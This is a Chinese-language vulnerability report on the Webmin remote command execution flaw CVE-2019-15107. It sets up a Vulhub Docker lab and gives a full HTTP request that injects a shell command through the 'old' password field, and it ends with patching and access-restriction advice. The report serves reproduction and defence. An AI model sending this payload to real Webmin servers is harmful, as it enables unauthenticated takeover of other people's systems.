漏洞编号:
CVE-2019-15107
漏洞描述:
Webmin是一款基于Web的远程管理工具,该工具存在一个远程命令执行漏洞(CVE-2019-15107)。攻击者可以通过特制的请求,未经身份验证的情况下执行任意命令,并可能导致服务器被完全控制。
影响版本:
Webmin版本:1.920及之前的版本
利用方法(利用案例):
cd ~/vulhub/webmin/CVE-2019-15107 //到家目录下的路径
ls
cat docker-compose.yml //看端口是否一致
sudo docker-compose up -d //拉取环境
sudo docker ps -a //检查是否启用成功
POST /password_change.cgi HTTP/1.1
Host: 192.168.5.141:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.5.141:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
附带文件:
此漏洞报告无附带文件。
加固建议:
-
尽快更新Webmin版本至1.930或更高版本,以修复该漏洞。
-
如果无法立即更新Webmin,可以采取以下措施之一:
-
禁用或限制Webmin的远程访问,仅允许访问来自受信任的IP地址。
-
使用防火墙规则,限制对Webmin的访问仅来自内部网络。
-
配置Web服务器强制使用HTTPS加密连接,并使用安全证书。
-
参考信息:
Vulhub - Docker-Compose file for vulnerability environment
漏洞分类:
远程命令执行/高危